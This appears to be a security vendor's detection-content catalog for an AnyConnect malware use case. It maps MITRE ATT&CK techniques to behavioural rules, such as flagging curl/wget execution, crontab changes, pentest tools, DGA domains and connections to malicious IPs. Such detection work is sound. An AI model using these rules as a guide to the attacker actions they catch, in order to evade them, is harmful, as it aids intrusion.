Product: AnyConnect
Use-Case: Malware
| Rules | Models | MITRE ATT&CK® TTPs | Activity Types | Parsers |
|---|---|---|---|---|
| 25 | 6 | 8 | 2 | 2 |
| Event Type | Rules | Models |
|---|---|---|
| process-network | T1053 - Scheduled Task/Job ↳ A-EPA-HP-CrontabMod-F: First execution of process on asset and the command of the process is crontab modification ↳ A-EPA-HP-CrontabMod-A: Abnormal execution of process on asset and the command of the process is crontab modification T1053.003 - T1053.003 ↳ A-EPA-HP-CrontabMod-F: First execution of process on asset and the command of the process is crontab modification ↳ A-EPA-HP-CrontabMod-A: Abnormal execution of process on asset and the command of the process is crontab modification TA0002 - TA0002 ↳ EPA-UH-Pen-F: Known pentest tool used ↳ A-EPA-HP-F: First execution of process on asset ↳ A-EPA-HP-A: Abnormal execution of process on asset ↳ A-EPA-ZP-A: Abnormal execution of process for the asset in this zone ↳ A-EPA-ZP-F: First execution of process for the asset in this zone ↳ A-EPA-OP-F: First execution of process for the asset in this organization ↳ A-EPA-OP-A: Abnormal execution of process for the asset in this organization ↳ A-EPA-HPP-F: First parent-process combination on asset ↳ A-EPA-HPP-A: Abnormal parent-process combination on asset ↳ A-EPA-OPP-F: First parent-process combination in this organization ↳ A-EPA-OPP-A: Abnormal parent-process combination in this organization ↳ A-EPA-TEMP-DIRECTORY-F: First execution of this process from a temporary directory on this asset ↳ A-EPA-TEMP-DIRECTORY-A: Abnormal execution of this process from a temporary directory ↳ A-EPA-HP-Commands-F: First execution of process on asset and the command of the process is curl/wget ↳ A-EPA-HP-Commands-A: Abnormal execution of process on asset and the command of the process is curl/wget T1568 - Dynamic Resolution ↳ EPA-UD-DGA-F: First access to this domain through network which has been identified as DGA ↳ EPA-UD-DGA-A: Abnormal access to this domain through network which has been identified as DGA ↳ EPA-UD-DGA-N: Common access to this domain through network which has been identified as DGA T1568.002 - Dynamic Resolution: Domain Generation Algorithms ↳ EPA-UD-DGA-F: First access to this domain through network which has been identified as DGA ↳ EPA-UD-DGA-A: Abnormal access to this domain through network which has been identified as DGA ↳ EPA-UD-DGA-N: Common access to this domain through network which has been identified as DGA TA0010 - TA0010 ↳ EPA-PI-ThreatIp: Process has created a connection to a bad reputation IP address TA0011 - TA0011 ↳ A-NET-TI-H-Outbound: Outbound connection to a known malicious host ↳ A-NET-TI-IP-Inbound: Inbound connection from a known malicious IP ↳ A-NET-TI-H-Inbound: Inbound connection from a known malicious host ↳ EPA-PI-ThreatIp: Process has created a connection to a bad reputation IP address |
• A-EPA-UP-TEMP: Processes executed from TEMP directories on this asset • A-EPA-OPP: Parent processes in the organization • A-EPA-HPP: Parent processes per host on this asset • A-EPA-ZP: Processes in the zone on asset • EPA-UH-Pen: Malicious tools used by user • EPA-UD-DGA: Top web domains that seem to be DGA generated for this user |
| vpn-login | T1078 - Valid Accounts ↳ Auth-Blacklist-Shost: User authentication or login from a known blacklisted IP |